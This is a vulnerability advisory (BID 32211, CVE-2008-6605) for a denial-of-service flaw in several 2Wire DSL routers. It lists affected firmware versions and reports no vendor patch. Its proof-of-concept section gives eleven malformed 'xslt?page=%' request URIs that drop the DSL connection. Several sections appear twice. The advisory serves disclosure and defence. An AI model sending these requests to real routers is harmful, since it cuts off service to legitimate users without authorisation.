Multiple 2Wire DSL Routers 'xslt' HTTP Request Denial of Service Vulnerability
BID:32211
Info
Multiple 2Wire DSL Routers 'xslt' HTTP Request Denial of Service Vulnerability
| Bugtraq ID: | 32211 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-6605 |
| Remote: | No |
| Local: | No |
| Published: | Nov 09 2008 12:00AM |
| Updated: | Apr 16 2015 05:51PM |
| Credit: | S21sec |
| Vulnerable: |
2Wire 2700HG Gateway 5.29.51 2Wire 2700HG Gateway 4.25.19 2Wire 2700HG Gateway 3.17.5 2Wire 2700HG Gateway 3.7.1 2Wire 2700HG 0 2Wire 2071HG 5.29.51 2Wire 2071HG 4.25.19 2Wire 2071HG 3.17.5 2Wire 2071HG 3.7.1 2Wire 2071 Gateway 5.29.135 .5 2Wire 2071 Gateway 5.29.51 2Wire 2071 Gateway 3.17.5 2Wire 2071 Gateway 3.7.1 2Wire 2071 0 2Wire 1800HW 5.29.135 .5 2Wire 1800HW 5.29.51 2Wire 1800HW 4.25.19 2Wire 1800HW 3.17.5 2Wire 1800HW 3.7.1 2Wire 1800HW 0 2Wire 1701HG 5.29.135 .5 2Wire 1701HG 5.29.51 2Wire 1701HG 4.25.19 2Wire 1701HG 3.17.5 2Wire 1701HG 3.7.1 2Wire 1701HG 0 2Wire 1700HG 0 |
| Not Vulnerable: | |
Discussion
Multiple 2Wire DSL Routers 'xslt' HTTP Request Denial of Service Vulnerability
Multiple 2Wire DSL routers are prone to a denial-of-service vulnerability because they fail to adequately handle specially crafted HTTP requests.
Successful exploits will cause the DSL connection to be dropped, denying service to legitimate users.
Multiple 2Wire DSL routers are prone to a denial-of-service vulnerability because they fail to adequately handle specially crafted HTTP requests.
Successful exploits will cause the DSL connection to be dropped, denying service to legitimate users.
Exploit / POC
Multiple 2Wire DSL Routers 'xslt' HTTP Request Denial of Service Vulnerability
Attackers can exploit this issue using a browser.
The following example URIs are available:
http://www.example.com/xslt?page=%&
http://www.example.com/xslt?page=%@
http://www.example.com/xslt?page=%!
http://www.example.com/xslt?page=%+
http://www.example.com/xslt?page=%;
http://www.example.com/xslt?page=%'
http://www.example.com/xslt?page=%~
http://www.example.com/xslt?page=%*
http://www.example.com/xslt?page=%0
http://www.example.com/xslt?page=%9
http://www.example.com/xslt?page=%?
Attackers can exploit this issue using a browser.
The following example URIs are available:
http://www.example.com/xslt?page=%&
http://www.example.com/xslt?page=%@
http://www.example.com/xslt?page=%!
http://www.example.com/xslt?page=%+
http://www.example.com/xslt?page=%;
http://www.example.com/xslt?page=%'
http://www.example.com/xslt?page=%~
http://www.example.com/xslt?page=%*
http://www.example.com/xslt?page=%0
http://www.example.com/xslt?page=%9
http://www.example.com/xslt?page=%?
Solution / Fix
Multiple 2Wire DSL Routers 'xslt' HTTP Request Denial of Service Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Multiple 2Wire DSL Routers 'xslt' HTTP Request Denial of Service Vulnerability
References:
References:
- 2wire Homepage (2wire)
- 2wire Remote Denial of Service (Pedro Joaquin
)